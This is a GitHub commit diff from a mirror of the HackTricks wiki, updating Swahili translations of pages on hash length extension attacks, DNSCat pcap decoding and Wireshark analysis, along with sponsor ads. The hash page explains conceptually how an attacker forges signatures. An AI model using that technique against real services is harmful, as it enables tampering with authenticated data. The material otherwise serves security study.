2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2025-02-18 23:18:33 +00:00

Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack.

This commit is contained in:
Translator 2024-04-18 04:08:12 +00:00
parent 6524ba67dd
commit 18d4d201f5
35 changed files with 1003 additions and 905 deletions
README.md
crypto-and-stego
generic-methodologies-and-resources
basic-forensic-methodology/pcap-inspection
threat-modeling.md
hardware-physical-access
linux-hardening
linux-post-exploitation
privilege-escalation/docker-security
apparmor.md
docker-breakout-privilege-escalation
macos-hardening
macos-red-teaming
macos-security-and-privilege-escalation
macos-files-folders-and-binaries
macos-users.md
mobile-pentesting
network-services-pentesting
pentesting-web
physical-attacks
todo/hardware-hacking
windows-hardening/windows-local-privilege-escalation

View file

@ -8,7 +8,7 @@ _Majina na muundo wa Hacktricks uliundwa na_ [_@ppiernacho_](https://www.instagr
**Karibu kwenye wiki ambapo utapata kila mbinu ya kudukua/kiufundi/chochote nilichojifunza kutoka kwa CTFs, programu halisi, kusoma utafiti, na habari.**
{% endhint %}
Ili kuanza, fuata ukurasa huu ambapo utapata **mtiririko wa kawaida** ambao **unapaswa kufuata wakati wa kufanya upimaji wa kuingilia** kwenye moja au zaidi ya **mashine:**
Ili kuanza, fuata ukurasa huu ambapo utapata **mtiririko wa kawaida** ambao **unapaswa kufuata wakati wa kupima usalama** wa moja au zaidi **ya mashine:**
{% content-ref url="generic-methodologies-and-resources/pentesting-methodology.md" %}
[pentesting-methodology.md](generic-methodologies-and-resources/pentesting-methodology.md)
@ -20,11 +20,11 @@ Ili kuanza, fuata ukurasa huu ambapo utapata **mtiririko wa kawaida** ambao **un
<figure><img src=".gitbook/assets/stm (1).png" alt=""><figcaption></figcaption></figure>
[**STM Cyber**](https://www.stmcyber.com) ni kampuni kubwa ya usalama wa mtandao ambayo kauli mbiu yao ni **KUDUKUA LISILOWEZEKANA**. Wanafanya utafiti wao wenyewe na kutengeneza zana zao za kudukua ili **kutoa huduma muhimu za usalama wa mtandao** kama upimaji wa kuingilia, Timu Nyekundu na mafunzo.
[**STM Cyber**](https://www.stmcyber.com) ni kampuni kubwa ya usalama wa mtandao ambayo kauli yao mbiu ni **DUKUA LISILOWEZEKANA**. Wao hufanya utafiti wao wenyewe na kutengeneza zana zao za kudukua ili **kutoa huduma muhimu za usalama wa mtandao** kama kupima usalama, Timu Nyekundu na mafunzo.
Unaweza kuangalia **blogi yao** kwenye [**https://blog.stmcyber.com**](https://blog.stmcyber.com)
Unaweza kuangalia **blogi** yao kwenye [**https://blog.stmcyber.com**](https://blog.stmcyber.com)
**STM Cyber** pia inasaidia miradi ya chanzo wazi ya usalama wa mtandao kama HackTricks :)
**STM Cyber** pia hutoa msaada kwa miradi ya chanzo wazi ya usalama wa mtandao kama HackTricks :)
***
@ -42,9 +42,9 @@ Unaweza kuangalia **blogi yao** kwenye [**https://blog.stmcyber.com**](https://b
<figure><img src=".gitbook/assets/image (44).png" alt=""><figcaption></figcaption></figure>
**Intigriti** ni jukwaa la kwanza la kudukua kwa maadili barani Ulaya na **bug bounty.**
**Intigriti** ni jukwaa la kwanza la kudukua kwa maadili barani Ulaya na **bug bounty platform.**
**Usaidizi wa bug bounty**: **jiandikishe** kwa **Intigriti**, jukwaa la **bug bounty la malipo ya juu lililoanzishwa na wadukuzi, kwa wadukuzi**! Jiunge nasi kwenye [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) leo, na anza kupata zawadi hadi **$100,000**!
**Mwongozo wa bug bounty**: **jiandikishe** kwa **Intigriti**, jukwaa la **bug bounty la malipo ya juu lililoanzishwa na wadukuzi, kwa wadukuzi**! Jiunge nasi kwenye [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) leo, na anza kupata zawadi hadi **$100,000**!
{% embed url="https://go.intigriti.com/hacktricks" %}
@ -70,7 +70,7 @@ Pata Ufikiaji Leo:
Jiunge na seva ya [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) ili kuwasiliana na wadukuzi wenye uzoefu na wawindaji wa bug bounty!
* **Machapisho ya Kudukua:** Shirikiana na maudhui yanayochimba kina katika msisimko na changamoto za kudukua
* **Habari za Kudukua za Wakati Halisi:** Endelea kufahamishwa na ulimwengu wa kudukua unaobadilika haraka kupitia habari na ufahamu wa wakati halisi
* **Habari za Kudukua za Wakati Halisi:** Endelea kufahamishwa na ulimwengu wa kudukua wenye haraka kupitia habari na ufahamu wa wakati halisi
* **Matangazo Mapya:** Endelea kufahamishwa na bug bounties mpya zinazoanzishwa na sasisho muhimu za jukwaa
**Jiunge nasi kwenye** [**Discord**](https://discord.com/invite/N3FrSbmwdy) na anza kushirikiana na wadukuzi bora leo!
@ -81,7 +81,7 @@ Jiunge na seva ya [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwd
<figure><img src=".gitbook/assets/image (12).png" alt=""><figcaption></figcaption></figure>
**Usanidi wa papo hapo wa upimaji wa udhaifu & upimaji wa kuingilia**. Tekeleza upimaji kamili kutoka mahali popote na zana na vipengele zaidi ya 20 vinavyoanzia uchunguzi hadi ripoti. Hatuchukui nafasi ya wapimaji wa kuingilia - tunatengeneza zana za desturi, ugunduzi & moduli za kutumia ili kuwarudishia muda wa kuchimba kina, kuvunja makompyuta, na kufurahi.
**Usanidi wa papo hapo wa upimaji wa udhaifu & kuingilia**. Tekeleza upimaji kamili kutoka mahali popote na zana na vipengele zaidi ya 20 vinavyoanzia uchunguzi hadi ripoti. Hatuchukui nafasi ya wapimaji wa usalama - tunatengeneza zana za desturi, ugunduzi & moduli za kudukua ili kuwarudishia muda wa kuchimba kina, kuvunja makompyuta, na kufurahi.
{% embed url="https://pentest-tools.com/" %}
@ -91,13 +91,13 @@ Jiunge na seva ya [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwd
<figure><img src=".gitbook/assets/image (2) (1).png" alt=""><figcaption></figcaption></figure>
SerpApi inatoa APIs za haraka na rahisi za wakati halisi za **kufikia matokeo ya injini za utaftaji**. Wanachimba injini za utaftaji, kushughulikia proksi, kutatua captchas, na kuchambua data iliyopangwa kwa utajiri kwa niaba yako.
SerpApi inatoa APIs za haraka na rahisi za wakati halisi za **kufikia matokeo ya injini za utaftaji**. Wao huchimba injini za utaftaji, kushughulikia proksi, kutatua captchas, na kuchambua data zote zenye muundo tajiri kwako.
Usajili kwa moja ya mipango ya SerpApi ni pamoja na ufikiaji wa zaidi ya APIs 50 tofauti za kuchimba injini za utaftaji tofauti, ikiwa ni pamoja na Google, Bing, Baidu, Yahoo, Yandex, na zingine.\
Tofauti na watoa huduma wengine, **SerpApi huchimba matokeo ya asili tu**. Majibu ya SerpApi mara kwa mara yanajumuisha matangazo yote, picha na video za ndani, grafu za maarifa, na vipengele vingine vilivyopo katika matokeo ya utaftaji.
Usajili kwa moja ya mipango ya SerpApi ni pamoja na ufikiaji wa zaidi ya APIs 50 tofauti za kuchimba injini za utaftaji, ikiwa ni pamoja na Google, Bing, Baidu, Yahoo, Yandex, na zingine.\
Tofauti na watoa huduma wengine, **SerpApi huchimba matokeo ya asili tu**. Majibu ya SerpApi mara kwa mara hujumuisha matangazo yote, picha na video za ndani, grafu za maarifa, na vipengele vingine vilivyopo katika matokeo ya utaftaji.
Wateja wa sasa wa SerpApi ni pamoja na **Apple, Shopify, na GrubHub**.\
Kwa habari zaidi tembelea [**blogi yao**](https://serpapi.com/blog/)**,** au jaribu mfano kwenye [**uwanja wao wa michezo**](https://serpapi.com/playground)**.**\
Kwa habari zaidi tembelea [**blogi**](https://serpapi.com/blog/)**** yao, au jaribu mfano kwenye [**uwanja wa michezo**](https://serpapi.com/playground)**.**\
Unaweza **kuunda akaunti ya bure** [**hapa**](https://serpapi.com/users/sign\_up)**.**
***
@ -114,20 +114,20 @@ Unaweza **kuunda akaunti ya bure** [**hapa**](https://serpapi.com/users/sign\_up
<figure><img src=".gitbook/assets/websec (1).svg" alt=""><figcaption></figcaption></figure>
[**WebSec**](https://websec.nl) ni kampuni ya kitaalamu ya usalama wa mtandao iliyoko **Amsterdam** ambayo husaidia **kulinda** biashara **ulimwenguni kote** dhidi ya vitisho vya usalama wa mtandao vya hivi karibuni kwa kutoa **huduma za usalama wa kuingilia** kwa njia **ya kisasa**.
[**WebSec**](https://websec.nl) ni kampuni ya kitaalamu ya usalama wa mtandao iliyoanzishwa huko **Amsterdam** ambayo husaidia **kulinda** biashara **ulimwenguni kote** dhidi ya vitisho vya usalama wa mtandao vya hivi karibuni kwa kutoa **huduma za usalama wa kushambulia** kwa njia **ya kisasa**.
WebSec ni **kampuni ya usalama ya kila kitu** ambayo inamaanisha wanafanya yote; Upimaji wa Kuingilia, Ukaguzi wa Usalama, Mafunzo ya Uelewa, Kampeni za Udukuzi, Ukaguzi wa Kanuni, Maendeleo ya Udukuzi, Kutoa Wataalam wa Usalama na mengi zaidi.
WebSec ni **kampuni ya usalama ya kila kitu** ambayo inamaanisha wanafanya yote; Kudukua, Ukaguzi wa Usalama, Mafunzo ya Uelewa, Kampeni za Udukuzi, Ukaguzi wa Kanuni, Maendeleo ya Udukuzi, Kutoa Wataalam wa Usalama na mengi zaidi.
Jambo lingine zuri kuhusu WebSec ni kwamba tofauti na wastani wa tasnia, WebSec **ina imani kubwa katika ujuzi wao**, kwa kiwango ambacho wana **hakikisha matokeo bora zaidi**, inasemwa kwenye tovuti yao "**Ikiwa hatuwezi kudukua, Hulipi!**". Kwa habari zaidi tazama [**tovuti yao**](https://websec.nl/en/) na [**blogi**](https://websec.nl/blog/) yao!
Jambo lingine zuri kuhusu WebSec ni kwamba tofauti na wastani wa tasnia WebSec ni **imara sana katika ujuzi wao**, kwa kiwango ambacho wana **hakikisha matokeo bora zaidi**, inasemwa kwenye tovuti yao "**Ikiwa hatuwezi kudukua, Hulipi!**". Kwa habari zaidi tazama [**tovuti**](https://websec.nl/en/) na [**blogi**](https://websec.nl/blog)**!**
Mbali na hayo, WebSec pia ni **msaidizi aliyejitolea wa HackTricks.**
Mbali na hayo WebSec pia ni **mchangiaji aliyejitolea wa HackTricks.**
{% embed url="https://www.youtube.com/watch?v=Zq2JycGDCPM" %}
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malwares za kuiba**.
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za kuiba**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba taarifa.
@ -135,9 +135,9 @@ Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
{% embed url="https://whiteintel.io" %}
## Leseni & Kukanusha
## Leseni & Taarifa ya Kisheria
Wapatie:
Waweza kuwachunguza hapa:
{% content-ref url="welcome/hacktricks-values-and-faq.md" %}
[hacktricks-values-and-faq.md](welcome/hacktricks-values-and-faq.md)
@ -145,14 +145,14 @@ Wapatie:
<details>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>

View file

@ -4,7 +4,7 @@
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
@ -12,13 +12,13 @@ Njia nyingine za kusaidia HackTricks:
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wame **vamiwa** na **malware za wizi**.
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za wizi wa habari.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba habari.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
@ -30,24 +30,24 @@ Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
Fikiria server ambayo ina **kutilia saini** baadhi ya **data** kwa **kuongeza** **siri** kwa baadhi ya data ya wazi inayojulikana kisha kuhakiki data hiyo. Ikiwa unajua:
* **Urefu wa siri** (hii inaweza pia kufanywa kwa nguvu kutoka kwa safu ya urefu uliyopewa)
* **Urefu wa siri** (hii inaweza pia kufanywa kwa nguvu kutoka kwa safu ya urefu uliopewa)
* **Data ya wazi**
* **Algoritimu (na ni dhaifu kwa shambulio hili)**
* **Kujaza inajulikana**
* Kawaida moja ya msingi hutumiwa, hivyo ikiwa mahitaji mengine 3 yanakidhiwa, hii pia ni
* Kujaza hubadilika kulingana na urefu wa siri+data, ndio maana urefu wa siri unahitajika
* Kawaida moja ya msingi hutumiwa, hivyo ikiwa mahitaji mengine 3 yanakidhiwa, hii pia inahitajika
* Kujaza hubadilika kulingana na urefu wa siri+data, ndio sababu urefu wa siri unahitajika
Basi, ni rahisi kwa **mshambuliaji** kuongeza **data** na **kuzalisha** saini halali kwa **data iliyopita + data iliyongezwa**.
## Vipi?
Kimsingi, algorithm dhaifu huzalisha hashes kwa kwanza **kutia hash kibodi cha data**, na kisha, **kutoka** kwa **hash iliyoundwa awali** (hali), wan **ongeza kibodi ijayo cha data** na **kuitia hash**.
Kimsingi, algorithm dhaifu huzalisha hash kwa kwanza **kutia hash kwa kundi la data**, na kisha, **kutoka** kwa **hash iliyoundwa hapo awali** (hali), wan **ongeza kundi la data linalofuata** na **kulitia hash**.
Kisha, fikiria kwamba siri ni "siri" na data ni "data", MD5 ya "siridata" ni 6036708eba0d11f6ef52ad44e8b74d5b.\
Kisha, fikiria kwamba siri ni "siri" na data ni "data", MD5 ya "secretdata" ni 6036708eba0d11f6ef52ad44e8b74d5b.\
Ikiwa mshambuliaji anataka kuongeza herufi "ongeza" anaweza:
* Kuzalisha MD5 ya "A" 64
* Badilisha hali ya hash iliyoundwa awali kuwa 6036708eba0d11f6ef52ad44e8b74d5b
* Kuzalisha MD5 ya 64 "A"s
* Badilisha hali ya hash iliyoinitialize hapo awali kuwa 6036708eba0d11f6ef52ad44e8b74d5b
* Kuongeza herufi "ongeza"
* Kumaliza hash na hash inayotokana itakuwa **halali kwa "siri" + "data" + "kujaza" + "ongeza"**
@ -59,13 +59,13 @@ Ikiwa mshambuliaji anataka kuongeza herufi "ongeza" anaweza:
Unaweza kupata shambulio hili limeelezewa vizuri katika [https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks)
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wame **vamiwa** na **malware za wizi**.
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za wizi wa habari.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba habari.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
@ -77,10 +77,10 @@ Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>

View file

@ -1,21 +1,34 @@
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
### [WhiteIntel](https://whiteintel.io)
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumiwa na **dark-web** inayotoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wame **vamiwa** na **malware za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba taarifa.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
{% embed url="https://whiteintel.io" %}
---
Ikiwa una pcap na data inayotolewa na **DNSCat** (bila kutumia encryption), unaweza kupata yaliyomo yaliyotolewa.
Unahitaji kujua kuwa **baiti 9 za kwanza** sio data halisi lakini zina uhusiano na **mawasiliano ya C\&C**:
Unahitaji kujua kuwa **baiti 9 za kwanza** sio data halisi lakini zinahusiana na **mawasiliano ya C\&C**:
```python
from scapy.all import rdpcap, DNSQR, DNSRR
import struct
@ -34,7 +47,7 @@ last = qry
#print(f)
```
Kwa maelezo zaidi: [https://github.com/jrmdev/ctf-writeups/tree/master/bsidessf-2017/dnscap](https://github.com/jrmdev/ctf-writeups/tree/master/bsidessf-2017/dnscap)\
Kwa habari zaidi: [https://github.com/jrmdev/ctf-writeups/tree/master/bsidessf-2017/dnscap](https://github.com/jrmdev/ctf-writeups/tree/master/bsidessf-2017/dnscap)\
[https://github.com/iagox86/dnscat2/blob/master/doc/protocol.md](https://github.com/iagox86/dnscat2/blob/master/doc/protocol.md)
@ -44,7 +57,7 @@ python3 dnscat_decoder.py sample.pcap bad_domain
```
<details>
<summary><strong>Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
@ -52,6 +65,6 @@ Njia nyingine za kusaidia HackTricks:
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>

View file

@ -1,22 +1,34 @@
# Mbinu za Wireshark
## Mbinu za Wireshark
<details>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
## Boresha ujuzi wako wa Wireshark
### [WhiteIntel](https://whiteintel.io)
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malwares za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na programu hasidi za kuiba habari.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** hapa:
{% embed url="https://whiteintel.io" %}
---
## Boresha Ujuzi wako wa Wireshark
### Mafunzo
@ -31,43 +43,43 @@ Mafunzo yafuatayo ni mazuri kujifunza mbinu za msingi za kuvutia:
**Taarifa za Mtaalam**
Kwa kubonyeza _**Analyze** --> **Taarifa ya Mtaalam**_ utapata **muhtasari** wa kinachoendelea kwenye pakiti zilizochambuliwa:
Kwa kubonyeza _**Analyze** --> **Expert Information**_ utapata **muhtasari** wa kinachoendelea kwenye pakiti zilizochambuliwa:
![](<../../../.gitbook/assets/image (253).png>)
**Anwani Zilizotatuliwa**
Chini ya _**Takwimu --> Anwani Zilizotatuliwa**_ unaweza kupata taarifa kadhaa zilizotatuliwa na wireshark kama bandari/mtandao hadi itifaki, MAC hadi mtengenezaji, n.k. Ni muhimu kujua ni nini kinahusika katika mawasiliano.
Chini ya _**Statistics --> Resolved Addresses**_ unaweza kupata taarifa kadhaa zilizotatuliwa na wireshark kama vile bandari/mtandao hadi itifaki, MAC hadi mtengenezaji, n.k. Ni muhimu kujua ni nini kinahusika katika mawasiliano.
![](<../../../.gitbook/assets/image (890).png>)
**Mfumo wa Itifaki**
Chini ya _**Takwimu --> Mfumo wa Itifaki**_ unaweza kupata **itifaki** zinazohusika katika mawasiliano na data kuhusu hizo.
Chini ya _**Statistics --> Protocol Hierarchy**_ unaweza kupata **itifaki** zinazohusika katika mawasiliano na data kuhusu hizo.
![](<../../../.gitbook/assets/image (583).png>)
**Mazungumzo**
Chini ya _**Takwimu --> Mazungumzo**_ unaweza kupata **muhtasari wa mazungumzo** katika mawasiliano na data kuhusu hayo.
Chini ya _**Statistics --> Conversations**_ unaweza kupata **muhtasari wa mazungumzo** katika mawasiliano na data kuhusu hayo.
![](<../../../.gitbook/assets/image (450).png>)
**Vipengele vya Mwisho**
Chini ya _**Takwimu --> Vipengele vya Mwisho**_ unaweza kupata **muhtasari wa vipengele vya mwisho** katika mawasiliano na data kuhusu kila moja.
Chini ya _**Statistics --> Endpoints**_ unaweza kupata **muhtasari wa vipengele vya mwisho** katika mawasiliano na data kuhusu kila moja.
![](<../../../.gitbook/assets/image (893).png>)
**Taarifa za DNS**
Chini ya _**Takwimu --> DNS**_ unaweza kupata takwimu kuhusu ombi la DNS lililorekodiwa.
Chini ya _**Statistics --> DNS**_ unaweza kupata takwimu kuhusu ombi la DNS lililorekodiwa.
![](<../../../.gitbook/assets/image (1060).png>)
**Grafu ya I/O**
Chini ya _**Takwimu --> Grafu ya I/O**_ unaweza kupata **grafu ya mawasiliano.**
